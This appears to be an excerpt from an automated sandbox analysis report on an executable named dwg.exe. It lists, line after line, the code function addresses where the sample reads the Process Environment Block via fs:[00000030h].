Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E26AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E26AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E26AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E26AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E257E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E257E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E257E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E257E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E257E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E257E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E30AE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E30AE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2C46A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E310EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E310EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E310EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2DFE87 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2716E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2576E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E318ED6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2736CC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2FFEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E288EC7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E244F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E244F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E27E730 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E27A70E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E27A70E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E26F716 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E31070D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E31070D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2DFF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2DFF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E25FF60 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E318F6A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E25EF40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E258794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2C7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2C7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2C7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2837F5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E27BC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2C6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2C6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2C6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2C6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E301C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E301C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E301C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E301C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E301C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E301C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E301C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E301C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E301C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E301C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E301C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E301C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E301C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E301C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E31740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E31740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E31740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E26746D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E27A44B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2DC450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2DC450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E25849B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E3014FB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2C6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2C6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2C6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E318CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E318D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E30E539 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E253D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E253D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E253D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E253D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E253D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E253D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E253D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E253D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E253D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E253D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E253D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E253D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E253D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E24AD30 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2CA537 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E274D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E274D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E274D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E26C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E26C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E283D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2C3540 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2F3D40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E267D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2735A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E271DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E271DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E271DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E3105AC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E3105AC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E272581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E272581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E272581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E272581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E242D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E242D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E242D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E242D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E242D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E27FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E27FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E25D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E25D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E30FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E30FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E30FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E30FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2F8DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2C6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2C6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2C6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2C6DC9 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2C6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2C6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E284A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E284A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E30AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E30AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E258A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E24AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E24AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E245210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E245210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E245210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E245210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E263A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2FB260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2FB260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E28927A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E318A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E249240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E249240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E249240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E249240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E30EA55 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2D4257 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2452A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2452A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2452A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2452A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2452A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E25AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E25AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E27FAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E27D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E27D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E272AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E272ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E30131B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E24DB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E273B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E273B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E24DB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E318B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E24F358 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E274BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E274BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E274BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E315BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E251B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E251B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2FD380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E272397 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E27B390 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E30138A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2703E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2703E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2703E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2703E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2703E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2703E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E26DBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2C53CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2C53CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E27002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E27002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E27002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E27002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E27002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E25B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E25B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E25B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E25B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E314015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E314015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2C7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2C7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2C7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E302073 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E311074 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E260050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E260050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2890AF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2720A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2720A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2720A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2720A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2720A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2720A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E27F0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E27F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E27F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E249080 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2C3884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2C3884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2440E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2440E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2440E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2458EC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2DB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2DB8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2DB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2DB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2DB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2DB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E264120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E264120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E264120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E264120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E264120 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E27513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E27513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E249100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E249100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E249100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E24C962 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E24B171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E24B171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E26B944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E26B944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2761A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2761A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C69A6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C51BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C51BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C51BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C51BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E3049A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E3049A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E3049A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E3049A4 mov eax, dword ptr fs:[00000030h]
